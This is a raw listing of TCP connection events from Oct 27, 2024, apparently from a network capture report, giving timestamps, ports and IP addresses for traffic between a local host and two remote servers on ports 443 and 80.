Oct 27, 2024 17:11:25.823451042 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826385975 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826457024 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826595068 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.826607943 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826646090 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826688051 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.826699018 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826713085 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.826719046 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.826731920 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.826735973 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.828639030 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.828663111 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.828736067 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.828834057 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.828856945 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.835778952 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.836257935 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.836558104 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.836632013 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.836632013 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.836673975 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.836704016 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.838438034 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.838469982 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.838543892 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.838670969 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.838697910 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.641118050 CET	80	57846	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:26.641331911 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:26.641850948 CET	80	57846	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:26.641906023 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:26.778157949 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.778639078 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.778682947 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.778990984 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.779093027 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.779109955 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.779233932 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.779263973 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.779711962 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.779717922 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780222893 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780468941 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780524969 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.780550003 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780833960 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.780841112 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780908108 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.780915976 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.780972004 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.781194925 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.781199932 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.781265974 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.781276941 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.781655073 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.781658888 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.909893990 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.910446882 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.910537004 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.910692930 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.910742044 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.910774946 CET	57850	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.910790920 CET	443	57850	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.911951065 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.912017107 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.912084103 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.912100077 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.912209988 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.912214994 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.912228107 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.912358046 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.913199902 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.913243055 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.913321018 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.913463116 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.913476944 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.914197922 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.914284945 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.914370060 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.914467096 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.914496899 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917164087 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917231083 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917284966 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.917294025 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917335987 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917418003 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.917444944 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917460918 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.917462111 CET	57851	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.917469978 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.917479038 CET	443	57851	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.919058084 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.919070005 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.919147015 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.919231892 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.919241905 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.935946941 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.936022043 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.936093092 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.936124086 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.936255932 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.936255932 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.936255932 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.936296940 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.937911034 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.937941074 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:26.938034058 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.938127041 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:26.938147068 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.004501104 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.004640102 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.004714012 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.004961014 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.004971027 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.004981041 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.004986048 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.008910894 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.008948088 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.010911942 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.011152983 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.011168003 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.240940094 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.241003990 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.659543037 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.660005093 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.660062075 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.660562992 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.660578966 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.664938927 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.665410995 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.665441036 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.665962934 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.665968895 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.671425104 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.671752930 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.671772957 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.672352076 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.672363043 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.691534996 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.691838980 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.691853046 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.692357063 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.692363977 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.765129089 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.765539885 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.765599012 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.766069889 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.766078949 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.789446115 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.789844990 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.789954901 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.790013075 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.790051937 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.790077925 CET	57853	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.790092945 CET	443	57853	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.795447111 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.795614958 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.795681953 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.799089909 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.799113035 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.799129009 CET	57852	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.799135923 CET	443	57852	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.801027060 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801074982 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.801167011 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801348925 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801367044 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.801595926 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801632881 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.801716089 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801842928 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.801860094 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.804486990 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.804518938 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.804564953 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.804578066 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.804630041 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.804766893 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.804785013 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.804807901 CET	57855	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.804817915 CET	443	57855	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.807202101 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.807229996 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.807337046 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.807466030 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.807491064 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.831691027 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.831830025 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.831912994 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.832043886 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.832051992 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.832065105 CET	57854	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.832070112 CET	443	57854	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.834568977 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.834590912 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.834665060 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.834815025 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.834830999 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.896152020 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.896301031 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.896410942 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.896534920 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.896548986 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.896560907 CET	57856	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.896567106 CET	443	57856	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.898936033 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.898967981 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:27.899045944 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.899204969 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:27.899220943 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.147710085 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:28.148030043 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:28.153359890 CET	80	57862	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:28.153455973 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:28.153503895 CET	80	57846	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:28.153589010 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:28.153795004 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:28.159065962 CET	80	57862	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:28.541531086 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.542082071 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.542117119 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.542512894 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.542526007 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.561634064 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.561945915 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.561963081 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.562330008 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.562339067 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.572010994 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.572464943 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.572530985 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.573029041 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.573046923 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.581864119 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.582253933 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.582326889 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.582582951 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.582596064 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.646910906 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.647559881 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.647578955 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.648062944 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.648068905 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.674671888 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.674756050 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.674829006 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.674854994 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.674907923 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.674969912 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.675066948 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.675097942 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.675122976 CET	57857	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.675138950 CET	443	57857	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.677448034 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.677478075 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.677557945 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.677706957 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.677717924 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.697443962 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.697813988 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.697876930 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.697957993 CET	57859	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.697971106 CET	443	57859	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.700303078 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.700372934 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.700450897 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.700644016 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.700675964 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.704884052 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.705028057 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.705108881 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.705137968 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.705137968 CET	57860	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.705163002 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.705174923 CET	443	57860	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.707195997 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.707231045 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.707361937 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.707515001 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.707544088 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.719933987 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.720067024 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.720155001 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.720257998 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.720279932 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.720292091 CET	57858	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.720299006 CET	443	57858	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.721987963 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.722016096 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.722112894 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.722213030 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.722235918 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779176950 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779236078 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779318094 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.779330969 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779397011 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779450893 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.779556036 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.779563904 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.779576063 CET	57861	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.779581070 CET	443	57861	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.781534910 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.781552076 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:28.781634092 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.781725883 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:28.781738997 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.299602032 CET	80	57862	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:29.299694061 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:29.300141096 CET	80	57862	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:29.300194025 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:29.434560061 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.435089111 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.435131073 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.435507059 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.435513973 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.476243973 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.476623058 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.476680994 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.476982117 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.476996899 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.483177900 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.483505964 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.483524084 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.483824015 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.483850002 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.483861923 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.484056950 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.484066963 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.484369040 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.484373093 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.529898882 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.530251026 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.530262947 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.530589104 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.530592918 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.563113928 CET	443	57863	13.107.246.51	192.168.2.4
